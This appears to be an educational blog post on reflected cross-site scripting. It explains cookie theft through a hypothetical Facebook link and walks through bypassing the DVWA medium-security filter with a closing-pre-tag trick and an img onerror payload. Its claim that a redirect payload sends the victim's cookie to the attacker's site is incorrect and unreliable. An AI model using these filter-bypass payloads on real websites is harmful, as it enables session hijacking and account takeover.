In Part 2, I showed another reflected XSS example, basic Html and other HTML javascript and XSS things. Let's look why Xss is a risk because in all the previous example we were using a basic and simple javascript which show a pop-up but why this pop-up is soo risky what an attacker can do with this pop-up.

 Effect OF XSS

If a web application is vulnerable for XSS attack that means we can execute a javascript, as you know javascript can work with HTML and with javascript a normal Html webpage is totally changed by its look and function. Javascript allow a developer to add some more functions to the website which is not possible with Html and CSS only.

 If we can execute a javascript then we can also add some function with modifying our javascript code. and the webpage will be changed because we have added a javascript from our end.

If an attacker executes an XSS javascript payload and copy the webpage link with the XSS payload and send it to the victim when victim open that link javascript executed in the victim browser. if an attacker creates an XSS payload which will download a malware then when a victim clicks on the link and javascript execute and download the malware inside the victim system.

If an attacker creates an XSS javascript payload which will capture the cookie of the webpage, then add a more advanced option to this XSS payload capture the cookie and sent a cookie to attacker website and send it to the victim when the victim clicks on the link this cookie will be sent to the attacker website. Let's take an example here.

suppose you are the victim and I am the attacker. you have facebook logged in so no need to enter your password to open your Facebook account. Now facebook is vulnerable for XSS. then I will create an XSS payload like this

<script>document.location.href="allabouthack.com"</script>

and execute this payload in facebook and it looks like this,

facebook.com/?s=<script>document.location.href="allabouthack.com"</script>

(?s is for search option in URL) if I send this link to the victim and you click on the link then this script will execute in your browser and this script will copy your login cookie with facebook and send it to the allabouthack.com and as a site admin if I go to the allabouthack site log page I will see your cookie and will use this cookie to log in your facebook account without username and password.

We will look at different Xss Payload for all the XSS (Reflected, stored and DOM) Let's continue with Reflted Xss.

DVWA Medium Security Reflected XSS

Open your DVWA and change the security from low to medium then click on the Reflected XSS.
Now enter the script we used with low security,

<script>alert(1)</script>

Now you can see that it's not showing a popup and our script is not executing. because as I said in part 2 javascript won't be executed if it's inside the HTML to confirm it right-click and select the view page source and search for alert.

You can see two things is happening here with medium security.

1.) with medium security there is a filter at in the web application and it's blocking our opening <script> tag because of that our payload is broken our script is closing but it is not starting it's blocked.

2.) again our payload is inside the Html tag <pre> 

To solve this and execute our payload we need to understand what we can do here.

1) we need to bypass the filter for <script> tag because it's blocked there are soo many methods like encoding, create a payload which doesn't require <script> etc we have to try all of them in the real scenario.

2.) else we have to create a payload which will work even inside the HTML tag or try to create a payload in such way that it executes outside the Html tag.

in real life, you should try to find out what is blocked like script as an English word is blocked or as a tag <script> apart from this which signs are blocked like < > ; / ' "  enter all of them one by one and see which is reflected and which one is blocked by doing this you get an idea how to can create your payload manually to bypass the filter or any other thing.

Let's solve this DVWA medium-security like a real-life scenario

Method 1


In the picture above for source code, you can see our input is inside a pre tag and it's closing after our input what if we close pre tag by our self by giving </pre> in the search box. let's try this enter the following payload there 
</pre><script>alert(1)</script>  submit it and see page source.
you can see that we were able to close the pre tag but again our opening script tag is blocked

there is one more pre tag after our payload at the end but it doesn't matter because we have closed the pre tag first, now there is no sense of closing the pre tag because our opening script tag is blocked now let's create a payload which doesn't require the opening script tag but by the method above you can execute your payload outside the HTML tag.

Method 2

Now we have to create a payload a which doesn't require opening script tag for that you can use your javascript knowledge or use cheat sheet which is an XSS payload list available for free. you can get the XSS cheat sheet to bypass the filter from Owasp and burp suit. for owasp, there is no specific link because they have soo many cheat sheet you can search on google owasp XSS cheat sheet and you will get of them. 

Now we need a without script tag XSS payload lets create with img tag and add it's attributed src so it will become like this <img src=  img tag is to add an image inside the page src is for the location where your image is stored  for payload we don't want to add image we just want this img tag to execute our payload and source should be anything except the image so it will be like that <img src=0 you can replicate 0 with any number or string-like hello in src we have to give address of the image which we want to display in the web page we we are giving and unknown character and it will give us an error/broken image.

now we will add our script which is onerror=alert(1)> this script means if there is an error then show pop-up saying 1. so our full payload will be like that.

<img src=0 onerror=alert(1)>


first, we are adding an img with img tag and src is from where you want to add an image but instead of an image we are giving unknown character so it will give an error after that we are telling that if there any error execute this script and show a pop-up now enter the above payload and it will show you a pop-up and our javascript will execute.

You can join our telegram channel for free ebooks and other updates. You can follow us on Twitter and Instagram.
Share it If you like it